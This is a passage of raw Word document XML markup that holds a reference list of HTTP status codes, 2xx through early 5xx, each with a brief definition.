        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2xx - Successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D82C6B3" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1817"/>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200 OK</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request has succeeded. The meaning of "success" varies depending on the HTTP method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0D9DCA" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1817"/>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GET</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The resource is returned in the response body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6B2346" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1817"/>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POST</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The resource has been created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F352CEB" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1817"/>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201 Created</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request has been fulfilled, and a new resource has been created (usually used with POST).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5608E9D8" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1817"/>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202 Accepted</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request has been accepted for processing, but the processing has not been completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFFDF55" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1817"/>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204 No Content</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server has successfully processed the request, but there is no content to return (used for DELETE or PUT requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29278DE2" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1817"/>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205 Reset Content</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server has successfully processed the request and instructs the client to reset the document view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7ACDF2" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1817"/>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206 Partial Content</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server is sending only a part of the resource (used for range requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3BBB9F" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3xx - Redirection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D997C3B" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1818"/>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300 Multiple Choices</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request has more than one possible response. The user or user agent can choose one of them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643FC97C" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1818"/>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301 Moved Permanently</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The resource has been permanently moved to a new URI. Future requests should use the new URI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E218305" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1818"/>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302 Found</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The resource has been temporarily moved to a new URI, and the client should use the original URI for future requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AC4303" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1818"/>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303 See Other</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The response to the request can be found under a different URI using the GET method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7993AF04" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1818"/>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304 Not Modified</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The resource has not been modified since the last request. The client can use the cached version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AE1FFE" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1818"/>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305 Use Proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The requested resource must be accessed through a proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000E30B7" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1818"/>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307 Temporary Redirect</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The resource has temporarily moved to a new URI. Future requests should use the original URI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6F7D00" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1818"/>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308 Permanent Redirect</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The resource has permanently moved to a new URI, similar to 301, but the method and body are not changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1B3C66" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4xx - Client Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E8DC8A" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1819"/>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400 Bad Request</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server cannot process the request due to malformed syntax.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A61588D" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1819"/>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401 Unauthorized</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Authentication is required and has failed or not been provided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538ED876" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1819"/>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402 Payment Required</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Reserved for future use, typically related to payment systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A130C66" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1819"/>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403 Forbidden</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server understands the request but refuses to authorize it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CF5D40" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1819"/>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404 Not Found</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The requested resource could not be found on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293942EF" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1819"/>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405 Method Not Allowed</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request method is not supported for the requested resource (e.g., using POST on a read-only resource).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C986C5" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1819"/>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lastRenderedPageBreak/>
        <w:t>406 Not Acceptable</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The requested resource is capable of generating only content that is not acceptable according to the Accept headers sent in the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1243F309" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1819"/>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407 Proxy Authentication Required</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The client must authenticate with the proxy server before proceeding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CF4DFA" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1819"/>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408 Request Timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server timed out waiting for the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EF4204" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1819"/>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409 Conflict</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request could not be completed due to a conflict with the current state of the resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC47742" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1819"/>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410 Gone</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The resource is no longer available and will not be available again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1FF6B7" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1819"/>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411 Length Required</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server refuses to accept the request without a defined Content-Length header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3848BF38" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1819"/>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412 Precondition Failed</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: One or more conditions specified in the request headers were not met.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DCA12E" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1819"/>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413 Payload Too Large</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request is larger than the server is willing or able to process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002059C0" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1819"/>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414 URI Too Long</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The URI provided is too long for the server to process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741FCDC6" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1819"/>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415 Unsupported Media Type</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server refuses to process the request because the media type is not supported.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03261986" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1819"/>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416 Range Not Satisfiable</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The range specified in the request cannot be satisfied by the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ADDD74" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1819"/>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417 Expectation Failed</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server cannot meet the requirements of the Expect header field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141598B1" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1819"/>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418 I'm a teapot</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An April Fools' joke defined in RFC 2324, indicating the server is a teapot and cannot brew coffee.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8F77D9" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5xx - Server Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F5867D" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1820"/>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500 Internal Server Error</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server encountered an unexpected condition that prevented it from fulfilling the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B354E44" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1820"/>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501 Not Implemented</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server does not support the functionality required to fulfill the request.</w:t>
      </w:r>
    </w:p>
